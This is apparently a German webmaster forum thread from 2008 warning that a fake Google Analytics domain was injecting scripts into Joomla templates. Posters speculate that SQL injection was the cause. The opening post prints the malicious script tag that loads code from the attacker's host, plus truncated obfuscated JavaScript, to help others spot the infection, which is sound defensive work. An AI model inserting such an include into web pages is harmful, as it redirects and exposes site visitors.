Falsche Google Site Hackt

Thomas Holzmann

Thomas Holzmann

Angesehenes Mitglied
analytics-google.info ist nicht von Google!

Die Seite wird hier bereits als Malware gelistet:
http://www.malwaredomainlist.com/mdl...cs-google.info


Es wird Code in die index.php vom Template eingeschleust der auf den ersten Blick wie der Tracking Code von Google Analytics aussieht
<script src="http://analytics-google.info/urchin.js"></script>

Original: <script src="http://www.google-analytics.com/urchin.js">

Neben diesem urchin.js wird weiterer verschlüsselter Code eingebunden:
http://www.joomlaportal.de/sicherhei...tml#post666372

Oben im Template:
<!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857 .... usw.

Ganz am ende im Template:
<script>check_content()</script><!-- 1213806179 --><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a) ... usw.


Wenn der Code in der Seite enthalten ist, werden Besucher die die Seite bei Google in den Suchergebnissen anklicken
auf eine analytics-google.info Suchseite weitergeleitet.
Die Suchbegriffe mit der die original Seite bei Google gefunden wurde werden übernommen.

Von den neuen Suchergebnissen wird man dann über Affiliate Seiten auf weitere Seiten geleitet.


Infos durch welche Lücke der Code eingeschleust wird gibt es bist jetzt nicht.
Und es ist auch noch unbekannt ob noch mehr auf der Seite verändert wird.

woody
 
kann es sein, dass die Seite mittlerweile schon auf das "richtige" Analytics linkt?
 
Wenn man nach der Site googelt, findet man gleich die Alexa-Statistik:

Traffic-Details

Da dürften schon ziemlich viele Seiten infiziert worden sein.

QUOTE (AdMarkt @ Fr 20.06.2008, 16:43)kann es sein, dass die Seite mittlerweile schon auf das "richtige" Analytics linkt?

Es ist nicht zu empfehlen, auf so eine Seite zu gehen.

Auch der neueste FireFox 3 hat ja schon wieder irgendein Loch. Zum Überprüfen / Angucken irgendein Download-Tool nutzen.


QUOTE (woody @ Fr 20.06.2008, 15:36)Es wird Code in die index.php vom Template eingeschleust


Na ja, zunächst einmal ist das bloß ein Joomla-Problem.

Interessanter ist dieser Hinweis:

Es scheint sich mal wieder um automatisierte Sql-Injektionen zu handeln, die (analog zu den hier und dort besprochenen Techniken) eben JavaScript-Code einschleusen. Nun nicht mehr auf dem MS-SqlServer, sondern wohl auf Joomla.
 
QUOTE (jAuer @ Fr 20.06.2008, 17:09) [...] Nun nicht mehr auf dem MS-SqlServer, sondern wohl auf Joomla.[...]

Joomla basiert auf einer SQL-Datenbank, deshalb ist es auch anfällig für SQL-Injektionen.
 
Sie müssen sich einloggen oder registrieren, um hier antworten zu können.
Zurück
Oben